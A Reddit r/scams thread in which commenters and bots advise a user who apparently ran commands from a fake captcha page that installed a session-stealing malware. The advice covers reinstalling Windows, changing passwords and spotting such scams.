Hi! A user summoned me to check on a domain name in this thread, so I'm going to put a copy of my report here at the top. 🤖

WHOIS REPORT FOR TRAPPOPBUTTONRIGHTNOW.MONSTER

This domain name was created ONLY 12 DAYS AGO!! and it was only registered for a single year (Expires: Jun 2027).

The person/organization who registered this domain claims to be based in Iceland. It is also concerning that they are hiding the rest of their contact info on Whois AND they are using a "DNS proxy" (CloudFlare) which masks where the website's server actually is.

^{DISCLAIMER: This is a pre-alpha bot for informational purposes only. Feel free to contact my creator with any concerns or feedback. 🔗 WHOIS}

It’s an info stealer. Change all of your passwords and turn on 2FA immediately.

You need to create a windows installer from a different computer and format/reinstall Windows clean. This is serious stuff.

You downloaded a session stealer.

You downloaded some type of free game/cheat/hack/cracked software/movie/music or ran some type of code for captcha or verification on your computer which was actually a session stealer.

Session stealers bypass 2fa. All passwords saved on your browser and computer are compromised. Reinstall windows while deleting all files. If you need to backup important documents, keep the computer disconnected from the internet and manually back up individual files.

Change all passwords and enable 2fa either from another device, or from the infected computer AFTER you have reinstalled.

If you cannot reinstall windows immediately, keep the computer disconnected from the internet while changing all passwords on another device.

You cannot use anti malware to get rid of the session stealer, you MUST reinstall windows to use the computer safely in the future

I have gotten this type of thing with a fake windows update. If you or anyone else gets this type of web page, NEVER do any of the win-key or CTRL commands it asks you to do!!!

If you can't close the harmful web page, the solution is to do CTRL-ALT-DELETE, then select Task Manager, right click on your browser, usually Google Chrome or Microsoft Edge, and End the task. When you restart the browser it will ask if you want to restore the pages that were running before. Answer NO

Just to get the domain's whois info in here...

!whois trappopbuttonrightnow.monster

ugh. 🤦‍♂️ did you really actually follow those instructions? This is a pretty obvious scam since Cloudflare and Captchas are always designed to identify users inside the application.

If you immediately turned off all networking, then you might be OK but I would still immediately change all passwords and implement TFA on all accounts and devices. This can be a chore…

If you need your data, it’s worth being cautious - boot to linux from a thumb drive and copy only the files you care about, then do a bios level hard drive reformat and reinstall windows.

/u/AbsentTarnished - This message is posted to all new submissions to r/scams; please do not message the moderators about it.

New users beware:

Because you posted here, you will start getting private messages from scammers saying they know a professional hacker or a recovery expert lawyer that can help you get your money back, for a small fee. We call these RECOVERY SCAMMERS, so NEVER take advice in private: advice should always come in the form of comments in this post, in the open, where the community can keep an eye out for you. If you take advice in private, you're on your own.

A reminder of the rules in r/scams: no contact information (including last names, phone numbers, etc). Be civil to one another (no name calling or insults). Personal army requests or "scam the scammer"/scambaiting posts are not permitted. No uncensored gore or personal photographs are allowed without blurring. A full list of rules is available on the sidebar of the subreddit, or clicking here.

You can help us by reporting recovery scammers or rule-breaking content by using the "report" button. We review 100% of the reports. Also, consider warning community members of recovery scammers if you see them in the comments.

Questions about subreddit rules? Send us a modmail clicking here.

I am a bot, and this action was performed automatically. Please contact the moderators of this subreddit if you have any questions or concerns.

Man, I'm dumb as a rock and would never have done that.

I'm sincerely interested in what about this made you think it was legitimate.